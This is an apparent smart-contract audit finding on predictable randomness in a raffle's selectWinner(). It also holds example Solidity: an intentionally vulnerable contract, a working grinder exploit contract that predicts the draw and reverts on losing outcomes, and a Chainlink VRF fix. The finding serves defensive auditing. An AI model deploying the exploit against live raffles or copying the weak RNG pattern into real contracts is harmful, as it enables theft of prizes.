The selection of the rarity in the raffle protocol is determined by hashing the encoded values of msg.sender and block.difficulty within the selectWinner() function.
Hashing these inputs with keccak256 does not make them random. keccak256 is deterministic, msg.sender is chosen by the caller (and can be ground over many candidate addresses, for example with CREATE2-deployed contracts), and block.difficulty is readable by any contract executing in the same block. Any caller can therefore evaluate the exact expression used by selectWinner() before committing, and take part only when the result is favourable, so the rarity selection can be both predicted and manipulated.
After the Merge (EIP-4399), the DIFFICULTY opcode that block.difficulty reads was repurposed while keeping its opcode number for backward compatibility: instead of the current block's Proof of Work difficulty it now returns PREVRANDAO, the RANDAO mix of the previous beacon block (Solidity 0.8.18 and later also expose it as block.prevrandao). PREVRANDAO is a public, predictable value rather than a secret random one, so contracts that derive pseudo-random numbers from it remain vulnerable.
The validator proposing a block knows its PREVRANDAO value in advance, because it is fixed by the previous block, and can even bias it by declining to propose. Any other participant can read the same value on-chain within the block and compute the pseudo-random value using the same logic as the smart contract, reverting the transaction whenever the outcome is unfavourable. Consequently, the NFT rarity can be manipulated, compromising the fairness and integrity of the raffle.
Manual code review
To enhance the security and reliability of the raffle protocol, it is strongly advised to source randomness from a verifiable randomness oracle such as Chainlink VRF: the random word is requested in one transaction and delivered, together with a proof verified on-chain, in a later transaction, so neither the caller nor the block proposer can know the outcome at the moment they commit. While a request is pending, the contract should reject new entries so the player set cannot change between request and fulfilment. Adopting such an off-chain solution significantly mitigates the risks associated with predictable pseudo-random number generation, safeguarding the protocol against manipulation and exploitation.
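The following Solidity is an added example, not the audited protocol's code, that illustrates both the vulnerable pattern described above and the recommended fix. PredictableRaffle is a hypothetical reconstruction of a selectWinner() that hashes msg.sender with block.prevrandao (the same opcode the page's block.difficulty reads after the Merge); RaffleGrinder shows how any caller, not only a validator, can recompute the result in the same block and revert on an unfavourable outcome; VrfRaffle shows the request-then-callback structure of Chainlink VRF v2. IVRFCoordinatorV2 is a minimal stand-in that declares only the one call used here; the real Chainlink interface is larger, and the keyHash, subscription id, confirmation count and gas limit are placeholder assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

// Hypothetical reconstruction of the vulnerable pattern (not the project's code).
contract PredictableRaffle {
    address[] public players;
    address public winner;

    function enter() external { players.push(msg.sender); }
    function playerCount() external view returns (uint256) { return players.length; }

    // VULNERABLE: both inputs are known to the caller before the call executes,
    // so the index is computable in advance. block.prevrandao == block.difficulty
    // (opcode 0x44) on post-Merge chains.
    function selectWinner() external {
        require(players.length > 0, "no players");
        uint256 idx = uint256(
            keccak256(abi.encodePacked(msg.sender, block.prevrandao))
        ) % players.length;
        winner = players[idx];
    }
}

// Exploit sketch: recompute the same expression in the same block and only
// let selectWinner() run when it picks us. A failed attempt costs gas only;
// the attacker retries in a later block. No validator privilege is required.
contract RaffleGrinder {
    PredictableRaffle public immutable raffle;

    constructor(PredictableRaffle _raffle) { raffle = _raffle; }

    function enter() external { raffle.enter(); }

    function attack() external {
        uint256 n = raffle.playerCount();
        // msg.sender inside selectWinner() will be this contract.
        uint256 idx = uint256(
            keccak256(abi.encodePacked(address(this), block.prevrandao))
        ) % n;
        require(raffle.players(idx) == address(this), "unfavourable block, retry");
        raffle.selectWinner();
    }
}

// Minimal stand-in for Chainlink's VRFCoordinatorV2Interface (assumption: only
// the single function needed here is declared).
interface IVRFCoordinatorV2 {
    function requestRandomWords(
        bytes32 keyHash,
        uint64 subId,
        uint16 minimumRequestConfirmations,
        uint32 callbackGasLimit,
        uint32 numWords
    ) external returns (uint256 requestId);
}

// Hardened raffle: randomness is requested in one transaction and delivered by
// the coordinator in a later one, after its VRF proof is verified on-chain.
contract VrfRaffle {
    IVRFCoordinatorV2 public immutable coordinator;
    bytes32 public immutable keyHash;   // placeholder: network-specific gas lane
    uint64 public immutable subId;      // placeholder: funded VRF subscription
    address[] public players;
    address public winner;
    uint256 public pendingRequest;      // 0 when no request is outstanding

    constructor(IVRFCoordinatorV2 _coordinator, bytes32 _keyHash, uint64 _subId) {
        coordinator = _coordinator;
        keyHash = _keyHash;
        subId = _subId;
    }

    // Entries are frozen while a request is pending so the player set cannot
    // be changed between request and fulfilment.
    function enter() external {
        require(pendingRequest == 0, "draw in progress");
        players.push(msg.sender);
    }

    // Step 1: the random word does not exist yet, so no caller or proposer can
    // branch on it here.
    function requestWinner() external {
        require(pendingRequest == 0 && players.length > 0, "bad state");
        pendingRequest = coordinator.requestRandomWords(keyHash, subId, 3, 200_000, 1);
    }

    // Step 2: entry point Chainlink's coordinator calls on consumers. Only the
    // coordinator may call it, and only for the request we actually made.
    function rawFulfillRandomWords(uint256 requestId, uint256[] calldata randomWords) external {
        require(msg.sender == address(coordinator), "only coordinator");
        require(requestId == pendingRequest, "unknown request");
        winner = players[randomWords[0] % players.length];
        pendingRequest = 0;
    }
}
```

The grinder works because everything selectWinner() hashes is already on-chain when the attacker's transaction starts; the VRF version removes that property by splitting the draw across two transactions, with the second one only callable by the coordinator after proof verification.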
Root cause: bad RNG. Impact: manipulate winner.